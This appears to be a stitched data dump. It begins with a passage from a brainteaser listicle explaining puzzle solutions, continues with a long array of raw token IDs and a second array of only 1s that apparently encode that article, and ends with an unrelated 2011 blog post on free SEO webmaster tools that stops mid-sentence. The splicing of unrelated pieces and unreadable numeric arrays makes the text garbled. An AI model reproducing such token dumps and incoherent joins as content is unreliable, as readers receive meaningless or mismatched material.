reviewed before he can take home the prize money. 10/ This brainteaser has a missing number. What is the missing number? Courtesy of Puzzles9 Similar to Sudoku, this puzzle created by Puzzles9 consists of a rectangle with nine squares, each containing a number, except for the bottom-right square. Read the first two rows of numbers horizontally, each as one number — 289 and 324. The pattern is that 17 x 17 = 289 and 18 x 18 = 324. So it stands to reason that the bottom row will be 19 x 19 = 361. Therefore, the missing number is one. 11/ This brainteaser features three pentagons, each with a set of five numbers. From left to right, let's label the pentagons A, B, and C. The difference between the numbers in pentagons A and B can be found in Pentagon C in the same location across the board. In other words, Pentagon B - Pentagon A = Pentagon C.
[ 1, 11647, 8496, 29915, 29873, 679, 3307, 310, 5844, 5155, 445, 1629, 408, 896, 2553, 630, 278, 6089, 297, 20147, 9717, 322, 3847, 292, 363, 6762, 29889, 1205, 896, 884, 301, 1166, 287, 920, 1568, 278, 12092, 4828, 1754, 1009, 4105, 1144, 21682, 29889, 13, 13, 4013, 10013, 5844, 1139, 363, 18615, 4656, 414, 380, 3427, 287, 16157, 29879, 29889, 13, 13, 1576, 1108, 5578, 1078, 304, 29901, 376, 3644, 263, 7751, 750, 29871, 29906, 29953, 29735, 322, 29871, 29896, 29900, 748, 1446, 373, 3377, 29892, 920, 2030, 338, 278, 7751, 29915, 29879, 15315, 3026, 13, 13, 5328, 338, 278, 5253, 310, 17040, 263, 7751, 3743, 7424, 304, 1371, 366, 4377, 714, 920, 2030, 278, 15315, 338, 29973, 13, 13, 1576, 8986, 750, 263, 3287, 304, 1827, 1048, 445, 2833, 11687, 9301, 5844, 1139, 29892, 607, 3897, 263, 534, 2548, 11261, 373, 20147, 29889, 13, 13, 13555, 278, 1243, 1139, 3512, 10636, 284, 29892, 278, 1383, 348, 29939, 292, 13151, 10317, 5492, 263, 3229, 5934, 393, 278, 1139, 471, 6839, 304, 22931, 376, 9695, 936, 3773, 8326, 404, 322, 385, 11509, 304, 1348, 25499, 1699, 5034, 304, 263, 14129, 13962, 29889, 13, 13, 29941, 29914, 13, 13, 4013, 1473, 19468, 5844, 1108, 2175, 278, 8986, 25798, 9613, 29889, 13, 13, 11863, 4656, 414, 881, 367, 2221, 304, 4505, 445, 29889, 13, 1177, 29903, 1367, 1001, 13, 13, 1576, 1139, 338, 29901, 376, 8439, 526, 29871, 29946, 29929, 26361, 8794, 701, 304, 752, 2650, 297, 278, 11203, 1510, 29889, 1670, 526, 29871, 29941, 29953, 901, 2319, 26361, 1135, 2919, 26361, 8794, 701, 304, 752, 2650, 29889, 1128, 1784, 2319, 26361, 526, 8794, 701, 304, 752, 2650, 3026, 13, 13, 12310, 1070, 24481, 471, 393, 565, 727, 526, 29871, 29946, 29929, 26361, 3001, 29892, 322, 727, 526, 29871, 29941, 29953, 901, 2319, 26361, 1135, 2919, 26361, 29892, 366, 29915, 29881, 23197, 29871, 29941, 29953, 515, 29871, 29946, 29929, 29889, 2648, 393, 5645, 29892, 727, 526, 29871, 29896, 29941, 2919, 26361, 322, 29871, 29941, 29953, 2319, 26361, 29892, 6593, 278, 1234, 338, 29871, 29941, 29953, 29889, 1205, 8790, 408, 393, 723, 2099, 727, 526, 29871, 29906, 29941, 901, 2319, 26361, 1135, 2919, 26361, 29892, 393, 3508, 29915, 29873, 1492, 29889, 13, 13, 1576, 15703, 1058, 4846, 278, 1139, 2678, 5429, 349, 3554, 688, 279, 29892, 376, 1576, 6474, 1734, 287, 372, 2743, 1213, 1205, 408, 372, 15028, 29892, 278, 1234, 338, 29871, 29946, 29906, 29889, 29945, 29901, 29871, 29946, 29929, 448, 29871, 29941, 29953, 353, 29871, 29896, 29941, 29892, 29871, 29896, 29941, 847, 29871, 29906, 353, 29871, 29953, 29889, 29945, 29892, 322, 29871, 29941, 29953, 718, 29871, 29953, 29889, 29945, 353, 29871, 29946, 29906, 29889, 29945, 29889, 27466, 2705, 29892, 4203, 310, 263, 11203, 22071, 472, 278, 11203, 1510, 29889, 13, 13, 29946, 29914, 13, 13, 15666, 1991, 8496, 29915, 29873, 8661, 373, 278, 1234, 304, 263, 1139, 1048, 1321, 5414, 322, 269, 7807, 15100, 29889, 13, 13, 10605, 29915, 29879, 278, 1139, 29901, 376, 29909, 767, 1321, 952, 263, 10435, 363, 395, 29953, 29900, 29889, 940, 269, 10071, 278, 10435, 363, 395, 29955, 29900, 29889, 940, 769, 1321, 952, 278, 10435, 1250, 363, 395, 29947, 29900, 29889, 1126, 540, 269, 10071, 278, 10435, 1449, 363, 395, 29929, 29900, 29889, 512, 278, 1095, 29892, 920, 1568, 6909, 1258, 278, 767, 1207, 470, 14074, 29973, 1394, 1258, 540, 2867, 1584, 3026, 13, 13, 29909, 1983, 17538, 297, 278, 341, 6762, 1212, 3244, 364, 4618, 515, 3907, 395, 29896, 29900, 29892, 395, 29906, 29900, 29892, 322, 395, 29941, 29900, 304, 16679, 1584, 29889, 1105, 825, 29915, 29879, 278, 1650, 29973, 13, 13, 5618, 2444, 304, 367, 17452, 2305, 1283, 338, 278, 2114, 393, 278, 767, 269, 10071, 278, 10435, 363, 395, 29955, 29900, 322, 769, 1321, 952, 372, 1250, 363, 395, 29947, 29900, 29892, 3907, 372, 1106, 763, 540, 10398, 395, 29896, 29900, 901, 29889, 1205, 278, 1959, 982, 304, 4505, 278, 1108, 338, 304, 1348, 310, 278, 1023, 22160, 408, 5004, 29901, 448, 29953, 29900, 718, 29871, 29955, 29900, 353, 29871, 29896, 29900, 322, 448, 29947, 29900, 718, 29871, 29929, 29900, 353, 29871, 29896, 29900, 29889, 13, 13, 1576, 767, 3732, 395, 29896, 29900, 411, 1269, 14686, 29892, 5480, 540, 2326, 1983, 263, 3001, 310, 395, 29906, 29900, 29889, 13, 13, 29945, 29914, 13, 13, 13720, 2155, 4275, 497, 7258, 263, 5844, 1108, 373, 20147, 393, 777, 2305, 8745, 304, 679, 1492, 29889, 13, 13, 3853, 4275, 497, 29892, 4148, 310, 376, 7999, 7843, 22639, 26514, 1699, 7258, 263, 15373, 310, 263, 282, 682, 17205, 2768, 263, 6862, 322, 18066, 287, 2305, 304, 4377, 714, 920, 1568, 310, 278, 6862, 338, 528, 11932, 282, 682, 29889, 3834, 20147, 4160, 4846, 701, 7389, 29892, 541, 4045, 11492, 304, 278, 18766, 29889, 13, 13, 7504, 3278, 304, 15197, 13377, 1241, 29915, 29879, 4323, 1634, 9555, 29892, 21828, 476, 4285, 29920, 29892, 278, 1820, 304, 17069, 278, 1108, 338, 278, 3171, 310, 278, 282, 682, 17205, 29889, 13, 13, 1576, 4038, 310, 263, 17205, 338, 29871, 29896, 29914, 29906, 313, 3188, 921, 3171, 467, 960, 591, 5251, 393, 278, 6862, 338, 263, 29871, 29896, 921, 29871, 29896, 5190, 29892, 591, 508, 1074, 393, 278, 2967, 310, 278, 282, 682, 17205, 338, 29871, 29896, 29892, 278, 3309, 310, 278, 6862, 29889, 2178, 591, 817, 304, 4377, 714, 338, 278, 3171, 29889, 13, 13, 29908, 1576, 1820, 8938, 338, 393, 278, 2217, 17205, 701, 2246, 338, 2788, 304, 278, 282, 682, 17205, 29892, 607, 2794, 393, 278, 2217, 17205, 338, 925, 263, 7968, 1873, 310, 278, 282, 682, 17205, 1699, 476, 4285, 29920, 1497, 29889, 13, 13, 29908, 29909, 2875, 310, 2788, 3367, 19536, 338, 393, 278, 11959, 310, 278, 3367, 19536, 29915, 3171, 29879, 674, 367, 278, 1021, 408, 278, 11959, 310, 1009, 22561, 1699, 540, 1497, 29889, 376, 23036, 278, 282, 682, 17205, 29915, 29879, 2967, 338, 8951, 278, 2217, 17205, 29915, 29879, 2967, 29892, 967, 3171, 338, 884, 8951, 278, 2217, 17205, 29915, 29879, 3171, 29889, 1205, 591, 1073, 393, 278, 2217, 17205, 29915, 29879, 3171, 2298, 278, 282, 682, 17205, 29915, 29879, 3171, 338, 29871, 29896, 29892, 577, 393, 2794, 278, 282, 682, 17205, 29915, 29879, 3171, 338, 29871, 29906, 29914, 29941, 29889, 1858, 688, 393, 373, 297, 322, 591, 679, 1749, 4038, 353, 29871, 29896, 29914, 29906, 921, 2967, 921, 3171, 353, 29871, 29896, 29914, 29906, 921, 29871, 29896, 921, 29871, 29906, 29914, 29941, 353, 29871, 29896, 29914, 29941, 1213, 13, 13, 7504, 3278, 304, 10288, 20919, 279, 29892, 278, 19075, 982, 304, 1234, 278, 937, 1139, 1048, 746, 278, 26068, 674, 599, 367, 1283, 338, 304, 2910, 714, 278, 18747, 363, 1269, 301, 18919, 1709, 322, 1074, 988, 1009, 376, 2696, 29908, 13926, 25457, 29889, 450, 1234, 29901, 1156, 5320, 6923, 29892, 746, 278, 4654, 3578, 756, 925, 6077, 1283, 322, 278, 937, 322, 1473, 26068, 526, 1603, 1283, 29889, 13, 13, 1762, 8161, 746, 599, 310, 278, 26068, 674, 2041, 373, 4208, 29892, 366, 817, 304, 1284, 278, 19087, 3619, 2999, 310, 278, 18747, 746, 278, 26068, 674, 367, 373, 29889, 450, 1234, 304, 393, 1139, 338, 393, 278, 301, 18919, 23676, 674, 599, 2041, 373, 4208, 472, 29871, 29896, 29906, 29900, 6923, 29892, 470, 1023, 6233, 29889, 13, 13, 1576, 4105, 6693, 29440, 11624, 310, 3023, 5844, 10693, 29892, 1269, 310, 607, 12778, 304, 470, 6674, 3687, 263, 16259, 2533, 470, 3234, 29889, 512, 2058, 310, 3651, 763, 921, 470, 343, 29892, 3138, 29892, 278, 4105, 6693, 29440, 5960, 277, 2667, 14890, 907, 314, 378, 267, 393, 526, 2845, 4069, 470, 505, 885, 29877, 3554, 310, 4796, 14890, 907, 314, 29892, 282, 682, 14890, 907, 314, 29892, 470, 1716, 29889, 13, 13, 1762, 4505, 278, 20285, 280, 29892, 366, 505, 304, 4377, 714, 825, 1353, 278, 4069, 14890, 907, 314, 378, 267, 29892, 4796, 14890, 907, 314, 885, 29877, 3554, 29892, 322, 282, 682, 14890, 907, 314, 885, 29877, 3554, 1269, 2755, 29889, 13, 13, 1576, 1234, 338, 393, 278, 4069, 14890, 907, 314, 27843, 11524, 278, 1353, 2211, 29892, 278, 4796, 14890, 907, 314, 885, 26793, 11524, 278, 1353, 1023, 29892, 322, 278, 282, 682, 14890, 907, 314, 885, 26793, 11524, 278, 1353, 697, 29889, 13, 13, 29947, 29914, 13, 13, 29909, 751, 2207, 3244, 310, 5189, 317, 1299, 5844, 5155, 5134, 697, 2305, 2000, 278, 376, 12676, 342, 1243, 1108, 3926, 1213, 13, 13, 8439, 526, 263, 2846, 5837, 304, 4505, 372, 29892, 541, 10288, 20919, 279, 9132, 263, 2560, 21697, 29889, 13, 13, 1576, 937, 770, 750, 385, 6588, 310, 29871, 29955, 29900, 29889, 2193, 29915, 29879, 29871, 29896, 29953, 3291, 2400, 278, 6588, 8158, 310, 29871, 29947, 29953, 29889, 512, 916, 3838, 29892, 29871, 29947, 29953, 448, 29871, 29955, 29900, 353, 29871, 29896, 29953, 29889, 4001, 727, 526, 282, 8041, 297, 278, 770, 29892, 278, 4328, 515, 278, 6588, 338, 29871, 29896, 29953, 282, 29889, 13, 13, 1576, 1473, 770, 750, 385, 6588, 310, 29871, 29929, 29906, 29889, 2193, 29915, 29879, 29871, 29953, 3291, 901, 1135, 278, 6588, 310, 29871, 29947, 29953, 29889, 512, 916, 3838, 29892, 29871, 29929, 29906, 448, 29871, 29947, 29953, 353, 29871, 29953, 29889, 1670, 526, 302, 8041, 297, 445, 770, 29892, 577, 278, 4328, 515, 278, 6588, 338, 29871, 29953, 302, 29889, 13, 13, 29933, 5658, 1438, 4413, 6588, 714, 4208, 813, 408, 278, 1108, 4083, 29892, 376, 8256, 278, 19435, 310, 278, 1023, 4413, 526, 12420, 29908, 813, 278, 822, 293, 277, 310, 3291, 756, 304, 367, 5186, 304, 278, 1190, 11242, 310, 3291, 29889, 7857, 29892, 29871, 29896, 29953, 282, 338, 5186, 304, 29871, 29953, 302, 29889, 13, 13, 27407, 292, 393, 964, 385, 6306, 29892, 591, 508, 5948, 4377, 714, 825, 282, 29914, 29876, 338, 29901, 13, 13, 29896, 29953, 282, 353, 29871, 29953, 302, 13, 13, 29886, 29914, 29876, 353, 29871, 29953, 29914, 29896, 29953, 29892, 470, 29871, 29941, 29914, 29947, 29889, 13, 13, 29929, 29914, 13, 13, 29909, 4908, 5844, 19217, 713, 4083, 540, 7484, 278, 376, 14369, 1556, 4100, 1722, 1108, 29908, 297, 5844, 1156, 29871, 29896, 29953, 29900, 2440, 29892, 541, 372, 1603, 4225, 304, 367, 23533, 9076, 287, 29889, 13, 13, 1576, 395, 29896, 7284, 26836, 5771, 304, 1058, 1310, 508, 6356, 393, 278, 6306, 16058, 304, 599, 6019, 3694, 29889, 4908, 5844, 19217, 713, 6290, 5765, 319, 2034, 29891, 801, 1497, 540, 7484, 278, 29871, 29896, 29953, 29900, 29899, 6360, 29899, 1025, 1108, 29892, 541, 670, 1650, 4225, 304, 367, 23533, 9076, 287, 1434, 540, 508, 2125, 3271, 278, 26836, 6909, 29889, 13, 13, 29896, 29900, 29914, 13, 13, 4013, 4105, 6693, 29440, 756, 263, 4567, 1353, 29889, 13, 13, 5618, 338, 278, 4567, 1353, 29973, 13, 29907, 473, 2167, 29891, 310, 349, 18813, 793, 29929, 13, 13, 8942, 2327, 304, 8383, 9154, 29892, 445, 20285, 280, 2825, 491, 349, 18813, 793, 29929, 11624, 310, 263, 16701, 411, 14183, 25256, 29892, 1269, 6943, 263, 1353, 29892, 5174, 363, 278, 5970, 29899, 1266, 6862, 29889, 13, 13, 6359, 278, 937, 1023, 4206, 310, 3694, 4029, 6753, 635, 29892, 1269, 408, 697, 1353, 813, 29871, 29906, 29947, 29929, 322, 29871, 29941, 29906, 29946, 29889, 13, 13, 1576, 4766, 338, 393, 29871, 29896, 29955, 921, 29871, 29896, 29955, 353, 29871, 29906, 29947, 29929, 322, 29871, 29896, 29947, 921, 29871, 29896, 29947, 353, 29871, 29941, 29906, 29946, 29889, 1105, 372, 15028, 304, 2769, 393, 278, 5970, 1948, 674, 367, 29871, 29896, 29929, 921, 29871, 29896, 29929, 353, 29871, 29941, 29953, 29896, 29889, 7857, 29892, 278, 4567, 1353, 338, 697, 29889, 13, 13, 29896, 29896, 29914, 13, 13, 4013, 4105, 6693, 29440, 5680, 2211, 11137, 351, 787, 29892, 1269, 411, 263, 731, 310, 5320, 3694, 29889, 13, 13, 4591, 2175, 304, 1492, 29892, 1235, 29915, 29879, 3858, 278, 11137, 351, 787, 319, 29892, 350, 29892, 322, 315, 29889, 450, 4328, 1546, 278, 3694, 297, 11137, 351, 787, 319, 322, 350, 508, 367, 1476, 297, 22901, 12841, 315, 297, 278, 1021, 4423, 4822, 278, 7613, 29889, 512, 916, 3838, 29892, 22901, 12841, 350, 448, 22901, 12841, 319, 353, 22901, 12841, 315, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Thursday, 7 April 2011 What are search engine optimization tools, webmaster tools, Google page rank checker, SEO tools, and how can these internet tools help to bring more quality traffic to your Blog? There are many free online web tools that webmasters can use to find out more information about their sites. The tools can also alert the webmasters to possible problems search engines may have with the site's template codes and design. Here, we shall, for the benefit of our new bloggers, explain how these webmaster tools might help improve your website's Page Rank ....... Search Engine Optimization We define Search Engine Optimization as – a method or process of improving and optimizing the ranking of a website in search engine results. With millions of pages of search results for any given keyword, webmasters would want to have their website appear among the first couple of search result listings. The higher the position or ranking, the greater the likelihood that internet users will visit your site. This Search Engine Optimization (or SEO) concept is no different from a brick-and-mortar shop where location and visibility affect how many customers will pass by the shop and hopefully drop in for a visit. On the internet, your virtual site deserves a good location and visibility, and SEO consultants believe they know how to achieve that. Blog Directory and Search Engine Listings After having published a Blog or website, the first thing to do is to make sure that the information relating to the site is available on the internet. Web Directories, Blog Directories and Search Engines are the internet Yellow Pages. Although the major Search Engines will crawl your website even without any action on your part, it will be much faster if you could proactively provide them your site information. We had written articles on how and where to submit the blog information so as to have your site fully indexed and appear in many places on the internet. Free SEO Tools After you have submitted your website's data to all the search engines and directories, you should be able to find your site somewhere on the internet. If you do a keyword search on your website's topic, you may find many other listings in the search results ahead of yours. These are the sites which have better page ranks and are optimized for the search engines. You can optimize your blog or website too. To attract business, many SEO sites have put up some of their SEO tools for free. Commercial sites which are serious in wanting to climb up the search ranking will pay the SEO consultants for more value-added services. If you are like us, blogging out of fun and passion, it might be better to use only the free services for a start. Suggested SEO Tools Many of the SEO webmaster sites have similar free tools and services. You can try any of them, though the one that we like is iWebTool. In fact, they have a link exchange program which you may want to check out. Among the SEO Tools, the ones we find useful in all these sites are:- Backlink Checker – A list of sites that have linked to your blog or website. PageRank is largely determined by the number and quality of links to your site. Monitor this and you can probably guess what your PageRank ought to be. Broken Link Checker – A look at which of the links in your site are pointing to incorrect or non-existent URLs. Having too many outdated and broken links on your web page may irritate not only the readers but the search spiders. Do this housekeeping once in a while to remove the bad links. Google PageRank Checker – The Google PageRank of your site. You can also download Mozilla Firefox with Google Toolbar to view the Google PageRanks of all the sites that you visit. Google PageRank Prediction – A future Google PageRank prediction. If you are dying to know, these sites can give you a fair estimate of your future PageRank. HTML Optimizer – A clean up of your HTML source code. Be careful when you apply the suggested changes though. Always good to backup the template before making any modification. Index Checker – Number of pages of your website that are indexed by search engines. If pages are missing from the index, try submitting your sitemap again. Keyword Density Checker – The keyword distribution in your webpage. This will by and large influence the sort of Ads that AdSense will place on your site. Keyword Suggestor – Suggested popular keywords for your website. Bear in mind these keywords when writing or editing your posts. Meta-tags Generator – Configuration of website's meta-tags. Tailor a suitable description and set of keywords to be inserted into the template. Reciprocal Link Checker – A check to see if the partners in your blogrolls or link exchange are linking to you. Spider Simulator – The page contents as seen by a search engine spider. Some may give you a breakdown of the commonly used keywords in your site. Traffic Graphs – A comparison of your site's and other competitor sites' traffic history graphs in Alexa. Website Speed Test – Speed of website page load. If you find the pageload time a little long, take some measures to have a Faster Web Page Load Time. Random Posts Man Behind This Blog Well I'm a 